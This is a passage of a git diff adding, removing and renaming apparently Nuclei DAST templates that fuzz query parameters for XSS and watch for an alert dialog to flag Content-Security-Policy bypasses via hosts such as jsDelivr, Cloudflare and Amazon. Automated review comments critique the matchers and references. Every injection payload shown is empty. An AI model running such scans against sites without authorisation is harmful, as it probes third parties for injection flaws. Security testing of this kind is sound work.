100644 dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml create 
mode 100644 dast/vulnerabilities/xss/csp/ring-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/search-yahoo-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/secure-adnxs-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/secure-gravatar-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/secure-quantserve-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/securepubads-doubleclick-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/segapi-quantserve-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/server-ethicalads-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/servicenow-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/shop-samsung-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/skype-config-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/smartcaptcha-yandexcloud-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/social-yandex-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/sogou-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/soundcloud-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/srv-carbonads-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/ssl-gstatic-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/sso-bytedance-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/st3-zoom-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/stackexchange-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/static-parastorage-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/storage-googleapis-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/storemapper-herokuapp-fastly-csp-xss.yaml create mode 100644 
dast/vulnerabilities/xss/csp/suggest-taobao-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/suggestqueries-youtube-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/virtualearth-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/visitor-pixplug-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/visitor-service-tealiumiq-csp-xss.yaml create mode 100644 
dast/vulnerabilities/xss/csp/vk-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/wb-amap-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/widget-usersnap-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/widgets-pinterest-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/wikipedia-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/wordpress-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/wordpress-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/wse-api-here-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-ancestrycdn-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-api-ibm-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml rename dast/vulnerabilities/xss/csp/{meteoprog-csp-xss.yaml => www-meteoprog-csp-xss.yaml} (50%) create mode 100644 dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml create mode 
100644 dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml delete mode 100644 dast/vulnerabilities/xss/csp/youku-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/zhike-help-360-csp-xss.yaml create mode 100644 dast/vulnerabilities/xss/csp/zhuanjia-sogou-csp-xss.yaml diff --git a/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml new file mode 100644 index 00000000000..6e557c29dd5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/1688-bebezoo-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: 1688-bebezoo-csp-xss + +info: + name: Content-Security-Policy Bypass via 1688 Bebezoo + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,1688 + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bebezoo_1688_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bebezoo_1688_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml b/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml deleted file mode 100644 index a55fd8da551..00000000000 --- a/dast/vulnerabilities/xss/csp/360cn-csp-xss.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: 360cn-csp-xss - -info: - name: Content-Security-Policy Bypass via 360.cn - author: DhiyaneshDK - severity: high - reference: - - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L208C19-L208C106 - metadata: - verified: true - tags: xss,csp-bypass,360cn - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '' - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "360.cn" - - "script-src" - condition: and \ No newline at end of file 
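Review bot: The http section now keeps only the reflected-`{{injection}}` body matcher, marked `internal: true`, and the headless `waitdialog` alert decides the final match, so nothing checks that the response's `Content-Security-Policy` header actually allow-lists the host this template is named after; any plain reflected XSS on the target will be reported as a CSP bypass via 1688 Bebezoo. I would keep a second internal matcher on the header next to the body one, `- type: word` / `part: content_security_policy` / `words: ["<allow-listed host — fill in from the CSPBypass entry>"]`, and add the same to the http matchers of every other new `*-csp-xss` template in this diff (amazon-aax-eu through d-adroll) and to the renamed aliexpress-acs template, whose hunk shows exactly those header matchers being removed. The reference now points at `blob/main/data.tsv`, which will drift as the upstream list changes; the earlier templates pinned a commit and line, and a pinned link should be restored here and in the sibling templates. The dialog name `bebezoo_1688_csp_xss` reverses the id order, presumably because a DSL identifier cannot begin with a digit; a one-line comment saying so above `name:` would keep the next maintainer from "fixing" it back to the id.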
diff --git a/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml similarity index 51% rename from dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml rename to dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml index 81c57a63570..dad3a24bbc3 100644 --- a/dast/vulnerabilities/xss/csp/aliexpress-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/aliexpress-acs-csp-xss.yaml @@ -1,11 +1,11 @@ -id: aliexpress-csp-xss +id: aliexpress-acs-csp-xss info: - name: Content-Security-Policy Bypass via AliExpress - author: DhiyaneshDK - severity: high + name: Content-Security-Policy Bypass via AliExpress ACS + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L4C5-L4C19 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,aliexpress @@ -33,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "aliexpress.com" - - "script-src" - condition: and \ No newline at end of file + - action: waitload + + - action: waitdialog + name: aliexpress_acs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "aliexpress_acs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml new file mode 100644 index 00000000000..e1930202cb4 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/amazon-aax-eu-csp-xss.yaml 
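Review bot: The rename changes `id: aliexpress-csp-xss` to `id: aliexpress-acs-csp-xss` and lowers `severity` from high to medium, but neither the hunk nor a comment records why; id-based include/exclude lists and findings keyed on the old id will silently stop matching, and a `# renamed from aliexpress-csp-xss` comment under `id:` (or a line in the PR description) would make the change traceable. The file also still ends without a newline (`\ No newline at end of file`), as do all the new templates in this diff; add the trailing newline so yamllint's `new-line-at-end-of-file` check and future diffs stay clean.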
@@ -0,0 +1,55 @@ +id: amazon-aax-eu-csp-xss + +info: + name: Content-Security-Policy Bypass via Amazon AAX EU + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,amazon + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: amazon_aax_eu_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "amazon_aax_eu_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml deleted file mode 100644 index 2c6a6cfb7f2..00000000000 --- a/dast/vulnerabilities/xss/csp/amazon-csp-xss.yaml +++ /dev/null 
@@ -1,51 +0,0 @@ -id: amazon-csp-xss - -info: - name: Content-Security-Policy Bypass via Amazon - author: DhiyaneshDK - severity: high - reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L136 - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L5C19-L5C100 - metadata: - verified: true - tags: xss,csp-bypass,amazon - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - - - - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{url_encode(injection)}}" - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "amazon.com" - - "script-src" - condition: and \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml b/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml new file mode 100644 index 00000000000..840966bbaf9 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/app-link-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: app-link-csp-xss + +info: + name: Content-Security-Policy Bypass via App Link + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,app + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: app_link_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "app_link_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml new file mode 100644 index 00000000000..136e3a1553e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/baidu-map-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: baidu-map-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Baidu Map API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,baidu + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: baidu_map_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "baidu_map_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml new file mode 100644 index 00000000000..11ea3a00a3b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/bazaarvoice-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: bazaarvoice-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Bazaarvoice API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bazaarvoice + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bazaarvoice_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bazaarvoice_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml new file mode 100644 index 00000000000..d0f39f40e0e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/bdimg-apps-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: bdimg-apps-csp-xss + +info: + name: Content-Security-Policy Bypass via BDIMG Apps + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bdimg + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bdimg_apps_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bdimg_apps_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml new file mode 100644 index 00000000000..4367e790d4d --- /dev/null +++ b/dast/vulnerabilities/xss/csp/bing-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: bing-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Bing API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bing + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: bing_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "bing_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml new file mode 100644 index 00000000000..0fbfa12fe91 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cas-criteo-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: cas-criteo-csp-xss + +info: + name: Content-Security-Policy Bypass via Criteo CAS + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,criteo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cas_criteo_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cas_criteo_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml new file mode 100644 index 00000000000..2ef7e508ab0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-arkoselabs-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: cdn-arkoselabs-csp-xss + +info: + name: Content-Security-Policy Bypass via Arkose Labs CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,arkoselabs + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_arkoselabs_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_arkoselabs_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml new file mode 100644 index 00000000000..0a1a772742c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-jsdelivr-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: cdn-jsdelivr-csp-xss + +info: + name: Content-Security-Policy Bypass via jsDelivr CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,jsdelivr + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_jsdelivr_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_jsdelivr_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml new file mode 100644 index 00000000000..9633102d173 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-shopify-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: cdn-shopify-csp-xss + +info: + name: Content-Security-Policy Bypass via Shopify CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,shopify + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_shopify_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_shopify_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml new file mode 100644 index 00000000000..2cb5b931a7a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdn-syncfusion-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: cdn-syncfusion-csp-xss + +info: + name: Content-Security-Policy Bypass via Syncfusion CDN + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,syncfusion + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdn_syncfusion_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdn_syncfusion_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml new file mode 100644 index 00000000000..3b41073cfe6 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/cdnjs-cloudflare-csp-xss.yaml @@ -0,0 +1,55 @@ +id: cdnjs-cloudflare-csp-xss + +info: + name: Content-Security-Policy Bypass via Cloudflare CDNJS + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cloudflare + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: cdnjs_cloudflare_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "cdnjs_cloudflare_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml new file mode 100644 index 00000000000..dd1d03c6088 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/challenges-cloudflare-csp-xss.yaml @@ -0,0 +1,55 @@ +id: challenges-cloudflare-csp-xss + +info: + name: Content-Security-Policy Bypass via Cloudflare Challenges + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,cloudflare + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: challenges_cloudflare_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "challenges_cloudflare_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/chartbeat-api-csp-xss.yaml new file mode 100644 index 00000000000..f19e169a728 --- /dev/null 
